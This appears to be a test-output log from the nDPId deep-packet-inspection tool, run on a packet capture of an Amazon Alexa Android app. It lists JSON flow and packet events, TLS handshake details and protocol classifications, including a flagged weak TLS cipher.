{"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076275,"flow_last_seen":1490976076275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076275,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1490976076275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076275,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Bx5AAEAGP9GsECrYNF7ohsHNAFDXKVsFAAAAAKAC\/\/8C1AAAAgQFtAQCCAoA9lwbAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1490976076338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076338,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwijBAAOcGFco0XuiGrBAq2ABQwc3F00\/v1ylbBnASH\/5mLQAAAgQFtAEDAwY="} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1490976076340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076340,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBx9AAEAGP+SsECrYNF7ohsHNAFDXKVsGxdNP8FAQAVewngAA"} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076275,"flow_last_seen":1490976076341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976076341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976080485,"flow_last_seen":1490976080485,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976080485,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1490976080485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080485,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80qBAAEAGOXysECrYIsc08JYEAbs8Ao8fAAAAAKAC\/\/9XyQAAAgQFtAQCCAoA9l2\/AAAAAAEDAwg="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1490976080542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080542,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7lgTyw5w6PAKPIKASaN+a6gAAAgQFtAQCCApEF4DYAPZdvwEDAwg="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1490976080543,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976080543,"pkt":"AMDKkaPvePiC0\/vCCABFAAA00qFAAEAGOYOsECrYIsc08JYEAbs8Ao8g8sOcO4AQAVcxOQAAAQEICgD2XcZEF4DY"} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976080485,"flow_last_seen":1490976080544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976080544,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1146,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976080485,"flow_last_seen":1490976080606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1490976080606,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976080485,"flow_last_seen":1490976080607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3649,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1490976080607,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082723,"flow_last_seen":1490976082723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082723,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1490976082723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082723,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8n\/hAAEAGdDKsECrYNu8YuoUFAbsbksFnAAAAAKAC\/\/9eHgAAAgQFtAQCCAoA9l6fAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082964,"flow_last_seen":1490976082964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082964,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1490976082964,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082964,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NvRAAEAG3TasECrYNu8YuoUGAbttlGhMAAAAAKAC\/\/9lHQAAAgQFtAQCCAoA9l64AAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1490976082969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976082969,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwftZAAOcG7l827xi6rBAq2AG7hQU1exHsG5LBaHASH\/6SVwAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1490976082973,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976082973,"pkt":"AMDKkaPvePiC0\/vCCABFAAAon\/lAAEAGdEWsECrYNu8YuoUFAbsbksFoNXsR7VAQAVfcyAAA"} 
+00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976082723,"flow_last_seen":1490976082975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976082975,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1490976083245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976083245,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWypAAOcGEgw27xi6rBAq2AG7hQaUlSPBbZRoTXASH\/4ogAAAAgQFtAEDAwY="} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1176,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082723,"flow_last_seen":1490976083245,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976083245,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1490976083337,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976083337,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNvVAAEAG3UmsECrYNu8YuoUGAbttlGhNlJUjwlAQAVdy8QAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085644,"flow_last_seen":1490976085644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085644,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1490976085644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085644,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8I8hAAEAGIyesECrYNF7ohrKHAbtpd3wLAAAAAKAC\/\/9ZswAAAgQFtAQCCAoA9l\/DAAAAAAEDAwg="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085829,"flow_last_seen":1490976085829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085829,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1490976085829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085829,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8qZ1AAEAGnVGsECrYNF7ohrKIAbvGQPZJAAAAAKAC\/\/+CmQAAAgQFtAQCCAoA9l\/UAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085832,"flow_last_seen":1490976085832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085832,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1490976085832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085832,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k2FAAEAGs42sECrYNF7ohrKJAbv5cMy2AAAAAKAC\/\/94+AAAAgQFtAQCCAoA9l\/XAAAAAAEDAwg="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085883,"flow_last_seen":1490976085883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085883,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1490976085883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085883,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/VAAEAGPiSsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/94MQAAAgQFtAQCCAoA9l\/cAAAAAAEDAwg="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085884,"flow_last_seen":1490976085884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1490976085884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA83c5AAEAGaSCsECrYNF7ohrKLAbvdeYISAAAAAKAC\/\/\/fjAAAAgQFtAQCCAoA9l\/cAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085891,"flow_last_seen":1490976085891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085891,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1490976085891,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085891,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8K1lAAEAGbNGsECrYwKgLAZYiH5Cn8nSEAAAAAKAC\/\/9ycAAAAgQFtAQCCAoA9l\/dAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHsZAAOcGgTQ0XuiGrBAq2AG7sofzK0GgaXd8DHASH\/6hqwAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwdw1AAOcGKO00XuiGrBAq2AG7sojjQR2VxkD2SnASH\/7+lwAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1490976085977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085977,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoI8lAAEAGIzqsECrYNF7ohrKHAbtpd3wM8ytBoVAQAVfsHAAA"} 
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1204,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085644,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqZ5AAEAGnWSsECrYNF7ohrKIAbvGQPZK40EdllAQAVdJCQAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085829,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QliIAAAAAp\/J0hVAUAAA7FAAAAAAAAAAA"} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1208,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085644,"flow_last_seen":1490976086218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 